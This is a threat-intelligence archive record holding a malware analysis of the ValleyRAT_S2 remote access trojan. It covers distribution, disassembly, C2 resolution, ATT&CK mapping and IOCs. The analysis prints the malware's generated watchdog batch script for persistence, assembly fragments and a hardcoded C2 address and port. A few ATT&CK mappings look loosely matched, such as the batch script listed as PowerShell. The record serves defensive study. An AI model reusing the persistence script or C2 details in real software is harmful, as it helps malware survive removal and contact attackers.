{
	"id": "6df4ef56-c279-43b2-bee8-251f371ec77d",
	"created_at": "2026-04-06T00:20:20.858116Z",
	"updated_at": "2026-04-10T03:30:57.261184Z",
	"deleted_at": null,
	"sha1_hash": "750a8dbcd47d7d74d6ee28be25dfc790096c91d9",
	"title": "ValleyRAT_S2 Chinese campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1543616,
	"plain_text": "ValleyRAT_S2 Chinese campaign\r\nBy APOPHIS\r\nPublished: 2026-02-18 · Archived: 2026-04-05 21:48:45 UTC\r\n11 min read\r\nJan 11, 2026\r\nValleyRAT_S2 represents the second-stage payload of the ValleyRAT malware family, a sophisticated Remote\r\nAccess Trojan (RAT) written in C++. This modular and stealthy malware has been actively used in cyber-espionage and financially motivated campaigns, primarily targeting Chinese-speaking regions, including mainland\r\nChina, Hong Kong, Taiwan, and Southeast Asia.\r\nThe S2 payload serves as the functional core of the malware, activated after successful initial infection. While\r\nStage 1 handles infiltration and evasion, Stage 2 implements the primary backdoor capabilities, command and\r\ncontrol communications, persistence mechanisms, and comprehensive system reconnaissance.\r\nDistribution Methods\r\n1. Fake Software Installers\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 1 of 17\n\nValleyRAT commonly disguises itself within:\r\nFake productivity tools (e.g., “AI表格生成工具” — AI-based spreadsheet generator)\r\nCracked or unofficial software downloads\r\nLegitimate-looking Chinese-language utilities\r\n2. DLL Side-Loading\r\nA primary and sophisticated delivery mechanism:\r\nLegitimate signed applications load malicious DLLs placed in the same directory.\r\nMalware DLLs mimic common library names (steam_api64.dll, apphelp.dll)\r\nExports are expected to maintain legitimacy\r\nAdvantages of this technique:\r\nEvades signature-based antivirus detection\r\nBypasses User Account Control (UAC) when executed correctly\r\nBlends seamlessly with legitimate software behavior\r\n3. 
Phishing Email Campaigns\r\nDeployed through targeted phishing operations:\r\nMalicious document attachments (.doc, .xls, .pdf)\r\nCompressed archives (.zip, .rar) containing disguised executables\r\nSocial engineering targeting specific organizations\r\n4. Software Update Abuse\r\nExploitation of legitimate update mechanisms:\r\nCompromise of update channels in popular local Chinese software\r\nInjection into software distribution networks\r\nAbuse of trusted software vendors’ infrastructure\r\nCore Capabilities Analysis\r\nSystem Reconnaissance\r\nThe malware performs a comprehensive system enumeration:\r\n· Operating System Information: Version, locale, architecture, environment variables\r\n· Registry Analysis: Policy settings, installed software detection\r\n· File System Scanning: Hidden drives, removable media, network shares\r\n· Process Enumeration: Running processes via snapshot APIs\r\n· Geolocation Data: Collection through locale APIs\r\nPersistence and Evasion Mechanisms\r\nAdvanced techniques for maintaining long-term access:\r\n· Task Scheduler Integration: Uses COM API for automatic startup\r\n· Volume Shadow Copy Manipulation: WMI and COM APIs for potential ransomware staging\r\n· DLL Masquerading: Impersonates legitimate system libraries\r\n· Sandbox Detection: Heuristic analysis to detect analysis environments\r\n· API Obfuscation: Dynamic resolution using GetProcAddress and LoadLibrary\r\nCode Injection and Lateral Movement\r\nSophisticated injection capabilities:\r\n· Thread Context Manipulation: Uses SetThreadContext for process hijacking\r\n· Memory Injection: WriteProcessMemory and CreateRemoteThread for payload delivery\r\n· Windows Hook Integration: SetWindowsHookEx for keystroke monitoring and control\r\nCommand and Control (C2) Infrastructure\r\nRobust communication framework:\r\n· Hardcoded Endpoints: IPs and ports (27.124.3.175:14852)\r\n· 
Custom Protocol: TCP-based communication with proprietary format\r\n· Traffic Mimicry: HTTP tunneling and benign traffic patterns\r\n· Modular Commands: File upload/download, shell execution, payload injection, credential harvesting\r\nTechnical Analysis\r\nC:\\Users\\Admin\\AppData\\Local\\Temp\\AI自动化办公表格制作生成工具安装包\\steam_api64.dll\r\n(Translated: “AI Automated Office Spreadsheet Creation Tool Installer”)\r\nThis path suggests the malware was disguised as a productivity tool or software update.\r\nIn this function, we can see a command execution routine. Its purpose is to launch a Windows command shell\r\n( cmd.exe ), wait until that shell completes execution, and then clean up any process handles.\r\nWhat This Function Does in Detail\r\n1. Constructs a SHELLEXECUTEINFO Structure on the Stack\r\nThe function sets up the necessary structure for a ShellExecuteExA call. This includes:\r\ncbSize = 0x40 → Size of the structure.\r\nlpVerb = \"open\" → Indicates an \"open\" action for the file.\r\nlpFile = \"cmd.exe\" → The executable to be run.\r\nOther members likely include:\r\nnShow = SW_HIDE or similar, to launch the shell invisibly (not shown in the screenshot but typical of malware\r\nbehavior).\r\nfMask = SEE_MASK_NOCLOSEPROCESS, to ensure it retrieves a process handle to wait on.\r\nThis structure is stored in local variables (stack space from [ebp-0F8h] to [ebp-0C4h] ), mimicking how\r\nstandard ShellExecuteExA works.\r\n2. 
Launches cmd.exe via ShellExecuteExA\r\nThe attacker-controlled or hardcoded executable ( cmd.exe ) is executed using ShellExecuteExA , which is more\r\nflexible than CreateProcess and can bypass certain security software detections or application whitelisting\r\nmechanisms.\r\nThis API spawns a child process ( cmd.exe ) and returns a process handle through SHELLEXECUTEINFO.hProcess .\r\nIf the launch fails (e.g., the structure is not correctly initialized or cmd.exe is missing), the function skips further\r\nexecution.\r\n3. Synchronizes Execution — Waits for Completion\r\nIf the shell process starts successfully and a valid handle is returned, the function calls WaitForSingleObject\r\nwith INFINITE timeout ( 0xFFFFFFFF ).\r\nThis causes the malware to pause until cmd.exe completes, ensuring serialized execution. In other words, no\r\nfurther payloads or instructions are executed until this shell process exits.\r\nThis ensures attackers’ commands are fully executed before the RAT proceeds or terminates.\r\n4. Cleans Up Resources — Closes Process Handle\r\nAfter the process has exited, the function calls CloseHandle on the process handle. This is proper cleanup and\r\nindicates deliberate, structured malware code (as opposed to sloppy or amateurish design). It minimizes suspicion\r\nfrom tools monitoring open handles or memory leaks.\r\nThis function is responsible for staging the environment, preparing filenames and paths, writing marker or\r\nhelper files, and then executing a secondary component, such as a batch file or injected payload.\r\n1. Structured Exception Handling (SEH) Setup for Crash Resistance\r\nThe function begins by configuring its own custom SEH handler. 
This helps it recover cleanly from errors or\r\navoid crashing in sandbox environments, which is a known evasion technique in advanced malware.\r\nBehavioral Outcome:\r\n· Protects the execution from abnormal termination\r\n· Increases stealth against sandboxes and AVs\r\n2. Staging Temporary Environment in %TEMP%\r\nThe malware uses the GetTempPathA API to retrieve the system's temporary directory (e.g.,\r\nC:\\Users\\Victim\\AppData\\Local\\Temp\\ ). It then uses this base path to generate dynamic filenames.\r\nBehavioral Outcome:\r\n· Avoids static file paths (makes IOC detection harder)\r\n· Ensures the payloads drop in a writable, user-specific location\r\n3. Generates and Writes target.pid\r\nIt builds a file path like %TEMP%\\target.pid and calls a helper function ( sub_10007EF0 ) that likely writes data into\r\nit. This file might contain:\r\n· A target process ID for future injection or monitoring\r\n· Configuration or timestamp data\r\nBehavioral Outcome:\r\n· Prepares synchronization or configuration markers\r\n· Possible inter-process communication (IPC)\r\n4. Prepares and Writes monitor.bat\r\nAnother temporary file is created called monitor.bat . This file is built dynamically using string functions, and\r\nit’s likely written to disk.\r\nIts purpose could be to:\r\n· Act as a persistence mechanism\r\n· Restart the RAT in case of failure\r\n· Be executed on boot or via Task Scheduler\r\n5. Executes a Process (Likely monitor.bat )\r\nUsing the initialized data, a custom process creation function is called. This results in the execution of a child\r\nprocess (probably monitor.bat ), which could:\r\n· Act as a watchdog\r\n· Start the final payload\r\n· Create scheduled tasks or perform privilege escalation\r\nThis is a staged batch script generator routine — it writes several lines into a memory buffer (at var_110 ) to later\r\nbe saved as a .bat file ( monitor.bat ). 
Here's what this script does:\r\nGenerated Batch Script Behavior\r\n@echo off\r\nset \"PIDFile=%TEMP%\\target.pid\"\r\nset \"VBSPath=\u003cdynamically given path\u003e\"\r\nset /p pid=\u003c\"%PIDFile%\"\r\ndel \"%PIDFile%\"\r\n:check\r\ntasklist /fi \"PID eq %pid%\" | findstr \u003enul\r\nif errorlevel 1 (\r\ncscript //nologo \"%VBSPath%\"\r\nexit\r\n)\r\ntimeout /t 15\r\ngoto check\r\nPurpose \u0026 Malware Behavior\r\nThis is a watchdog batch script generator. Its job is to:\r\n· Monitor a process (by PID)\r\n· Restart the malware via a VBS script if killed\r\n· Stay persistent in memory\r\n· Evade user attention (silent \u0026 headless)\r\n1. Folder Path Resolution Using CSIDL\r\npush 1Ah; CSIDL_APPDATA\r\n· CSIDL 0x1A refers to the APPDATA folder (typically C:\\Users\\\u003cuser\u003e\\AppData\\Roaming ).\r\n· A call is made to a subroutine ( sub_1000A760 ) that likely wraps SHGetFolderPathA or similar to resolve this\r\npath.\r\n· The result is stored in [ebp-84h] , then moved to [ebp-88h] for future use.\r\nPurpose: To prepare a base directory (AppData\\Roaming) for writing files or building paths.\r\n2. Concatenates Subpath \\Promotions\\Temp.aps\r\npush offset aPromotionsTemp ; \"\\\\Promotions\\\\Temp.aps\"\r\npush edx ; AppData path\r\ncall sub_10007EF0 ; likely a `PathCombine` or `sprintf` variant\r\n· Constructs a full path like:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Promotions\\Temp.aps\r\nPurpose: Preparing for storing or staging malware data/config.\r\n3. 
Sleep Delay\r\npush 0x3A98 ; 15000 ms = 15 seconds\r\ncall Sleep\r\n· Delays execution, often used to:\r\no Evade sandbox timeouts\r\no Wait for parent process to finish\r\no Time synchronization between threads\r\n4. Memory Construction of Telegra.exe\r\nmov byte ptr [ebp-28h], 54h ; 'T'\r\nmov byte ptr [ebp-27h], 65h ; 'e'\r\nmov byte ptr [ebp-26h], 6Ch ; 'l'\r\nmov byte ptr [ebp-1Dh], 65h ; 'e'\r\n· Builds the ASCII string \"Telegra.exe\" into stack memory (starting at [ebp-28h] ).\r\n· Used later as a filename or argument to a function.\r\nPurpose: Stage payload under a benign name (like Telegram) to evade detection or trick users/analysts.\r\n5. Memory Construction of WhatsApp.exe\r\nmov byte ptr [ebp-48h], 57h ; 'W'\r\nmov byte ptr [ebp-47h], 68h ; 'h'\r\nmov byte ptr [ebp-3Dh], 65h ; 'e'\r\nPurpose: Possibly used for masquerading, side-loading, or injecting into a legitimate-looking process.\r\nDNS Resolution \u0026 C2 Prep\r\n1. Preparation of addrinfo Hints Structure\r\nThe malware prepares a struct addrinfo (likely on the stack) used as a filter for resolving hostnames:\r\nmov [ebp+Hints.ai_flags], ecx\r\nmov [ebp+Hints.ai_family], ecx ; AF_UNSPEC (0)\r\nmov [ebp+Hints.ai_socktype], 1 ; SOCK_STREAM (TCP)\r\nmov [ebp+Hints.ai_protocol], 6 ; IPPROTO_TCP\r\nPurpose: Tells getaddrinfo to:\r\nUse any IP version (IPv4/6)\r\nUse TCP streams\r\nPrefer TCP over UDP\r\n2. Hostname \u0026 Port Setup\r\npush offset aServiceName; “14852”\r\npush offset aNodeName ; “27.124.3.175”\r\ncall ds:getaddrinfo\r\nPurpose: Resolves the IP and port into a sockaddr for creating a connection to the Command-and-Control (C2)\r\nserver.\r\n3. 
Handling the Result\r\nmov [ebp+ppResult], eax\r\ntest edx, edx\r\njz loc_10013586\r\ngetaddrinfo returns a result in eax.\r\nIf it fails (edx == 0), the function jumps to an error handler or a retry loop.\r\n4. Sleep on Failure\r\npush 088Bh; Sleep 2187 ms\r\ncall Sleep\r\nIf resolution fails, the malware sleeps ~2.2 seconds before retrying.\r\nThis is a stealth mechanism to avoid aggressive network activity or detection.\r\nFinally, I developed a C2 configuration extractor tailored for the sample I analyzed, which successfully parsed the\r\nbinary and extracted the embedded C2 servers. The extractor successfully identified and retrieved the hardcoded\r\nC2 IP addresses from the file.\r\nValleyRAT_s2 MITRE ATT\u0026CK Framework Mapping\r\nInitial Access\r\nT1566.001 — Phishing: Spearphishing Attachment\r\nEvidence: Delivered via malicious document attachments (.doc, .xls, .pdf)\r\nBehavior: Archives (.zip, .rar) containing disguised executables and sideloaded DLLs\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nEvidence: Abuse of update mechanisms in popular tools (smaller/local Chinese software)\r\nBehavior: Infiltration through legitimate software update processes\r\nExecution\r\nT1204.002 — User Execution: Malicious File\r\nEvidence: Fake software installers disguised as productivity tools\r\nBehavior: “AI表格生成工具” (AI-based spreadsheet generator), cracked software downloads\r\nT1059.003 — Command and Scripting Interpreter: Windows Command Shell\r\nEvidence: Function launches cmd.exe via ShellExecuteExA\r\nBehavior: Constructs the SHELLEXECUTEINFO structure, waits for completion 
with\r\nWaitForSingleObject\r\nT1059.005 — Command and Scripting Interpreter: Visual Basic\r\nEvidence: Generated batch script calls VBScript (cscript //nologo)\r\nBehavior: Watchdog mechanism using VBS for persistence\r\nT1059.001 — Command and Scripting Interpreter: PowerShell\r\nEvidence: Batch script generation for process monitoring\r\nBehavior: Creates monitor.bat for automated execution\r\nPersistence\r\nT1053.005 — Scheduled Task/Job: Scheduled Task\r\nEvidence: Registers itself via the Task Scheduler COM API\r\nBehavior: Survives system reboots through scheduled task creation\r\nT1574.002 — Hijack Execution Flow: DLL Side-Loading\r\nEvidence: Masquerades as legitimate DLLs (steam_api64.dll, apphelp.dll)\r\nBehavior: Placed in the same directory as legitimate applications, evades signature-based detection\r\nT1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nEvidence: Watchdog batch script for automatic restart\r\nBehavior: Monitor.bat ensures malware restarts if killed\r\nPrivilege Escalation\r\nT1055.002 — Process Injection: Portable Executable Injection\r\nEvidence: Uses SetThreadContext, WriteProcessMemory, CreateRemoteThread\r\nBehavior: Injects code into legitimate processes\r\nT1055.003 — Process Injection: Thread Execution Hijacking\r\nEvidence: SetThreadContext API usage\r\nBehavior: Hijacks thread execution in target processes\r\nDefense Evasion\r\nT1574.002 — Hijack Execution Flow: DLL Side-Loading\r\nEvidence: steam_api64.dll masquerades as a legitimate Steam API\r\nBehavior: Bypasses User Account Control (UAC), evades signature-based AVs\r\nT1027.002 — Obfuscated Files or Information: Software Packing\r\nEvidence: Uses software packing to delay sandbox unpacking\r\nBehavior: Obfuscated code structure, potential string/section 
encryption\r\nT1036.005 — Masquerading: Match Legitimate Name or Location\r\nEvidence: Mimics legitimate applications (Telegra.exe, WhatsApp.exe)\r\nBehavior: Uses familiar application names to avoid suspicion\r\nT1497.001 — Virtualization/Sandbox Evasion: System Checks\r\nEvidence: Detects sandbox/debugging environments via heuristics\r\nBehavior: Anti-debugging techniques, structured exception handling (SEH)\r\nT1055.012 — Process Injection: Process Hollowing\r\nEvidence: Hooks into Windows messaging APIs via SetWindowsHookEx\r\nBehavior: Keystroke monitoring and control hijacking\r\nT1070.004 — Indicator Removal on Host: File Deletion\r\nEvidence: Batch script deletes PID file after reading\r\nBehavior: del “%PIDFile%” command removes tracking files\r\nDiscovery\r\nT1082 — System Information Discovery\r\nEvidence: GetEnvironmentStrings API usage\r\nBehavior: Collects OS version, locale, architecture, and environment variables\r\nT1057 — Process Discovery\r\nEvidence: Process32First, CreateToolhelp32Snapshot, Process32Next APIs\r\nBehavior: Enumerates running processes using snapshot APIs\r\nT1012 — Query Registry\r\nEvidence: RegOpenKey, RegQueryValueEx APIs\r\nBehavior: Queries registry keys for policy settings and software presence\r\nT1518 — Software Discovery\r\nEvidence: Loops through the file system and registry\r\nBehavior: Identifies installed software and configurations\r\nT1083 — File and Directory Discovery\r\nEvidence: FindFirstFileEx, GetFileSizeEx APIs\r\nBehavior: Scans file systems, including hidden and removable drives\r\nT1614 — System Location Discovery\r\nEvidence: GetLocaleInfo API\r\nBehavior: May collect geolocation data from locale APIs\r\nT1120 — Peripheral Device Discovery\r\nEvidence: Enumerates connected drives\r\nBehavior: Discovers removable media and network drives\r\nCollection\r\nT1005 — Data from Local System\r\nEvidence: File system 
scanning capabilities\r\nBehavior: Harvests data from local storage devices\r\nT1056.001 — Input Capture: Keylogging\r\nEvidence: SetWindowsHookEx API for keystroke monitoring\r\nBehavior: Captures user input through Windows message hooks\r\nCommand and Control\r\nT1071.001 — Application Layer Protocol: Web Protocols\r\nEvidence: May tunnel over HTTP or mimic benign traffic patterns\r\nBehavior: Evades firewall detection through protocol mimicry\r\nT1573.001 — Encrypted Channel: Symmetric Cryptography\r\nEvidence: Custom TCP-based protocol\r\nBehavior: Uses hardcoded IPs and ports\r\nT1105 — Ingress Tool Transfer\r\nEvidence: Can receive modular commands\r\nBehavior: Upload/download files, inject payloads\r\nT1071.004 — Application Layer Protocol: DNS\r\nEvidence: DNS resolution for C2 communication\r\nBehavior: getaddrinfo calls to resolve 27.124.3.175:14852\r\nExfiltration\r\nT1041 — Exfiltration Over C2 Channel\r\nEvidence: Custom TCP protocol for data transmission\r\nBehavior: Exfiltrates collected data through established C2 channels\r\nImpact\r\nT1490 — Inhibit System Recovery\r\nEvidence: Uses Volume Shadow Copy, WMI, and COM APIs\r\nBehavior: Potentially stages for ransomware deployment\r\nT1489 — Service Stop\r\nEvidence: Process monitoring and termination capabilities\r\nBehavior: Watchdog script monitors and controls process execution\r\nIOCs\r\nFile Hashes:\r\nd6387be78d258a820e4cb35ec53c65d52a813b63147488629b56269f6648adc1 \u003e\u003e valleyrat_s2\r\nNetwork Indicators:\r\n27.124.3.175:14852\r\nFile Paths:\r\nC:\\Users\\Admin\\AppData\\Local\\Temp\\AI自动化办公表格制作生成工具安装包\\steam_api64.dll\r\n%TEMP%\\target.pid\r\n%TEMP%\\monitor.bat\r\n%APPDATA%\\Promotions\\Temp.aps\r\nProcess Names:\r\nsteam_api64.dll\r\nTelegram.exe\r\nWhatsApp.exe\r\nmonitor.bat\r\nConclusion\r\nValleyRAT_S2 represents a sophisticated and well-engineered threat with advanced persistence, evasion, and\r\ncommand execution capabilities. Its modular design and focus on Chinese-speaking regions indicate a targeted\r\napproach to cyber-espionage and financial crime. Organizations should implement comprehensive defense\r\nstrategies, including network monitoring, behavioral analysis, and user education, to effectively counter this\r\nthreat.\r\nThe malware’s use of legitimate software masquerading, advanced injection techniques, and robust C2\r\ninfrastructure demonstrates the evolving sophistication of modern RAT families. Continuous monitoring and\r\nadaptive security measures are crucial for an effective defense against advanced persistent threats.\r\nSource: https://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416"
	],
	"report_names": [
		"valleyrat-s2-chinese-campaign-4504b890f416"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434820,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/750a8dbcd47d7d74d6ee28be25dfc790096c91d9.pdf",
		"text": "https://archive.orkl.eu/750a8dbcd47d7d74d6ee28be25dfc790096c91d9.txt",
		"img": "https://archive.orkl.eu/750a8dbcd47d7d74d6ee28be25dfc790096c91d9.jpg"
	}
}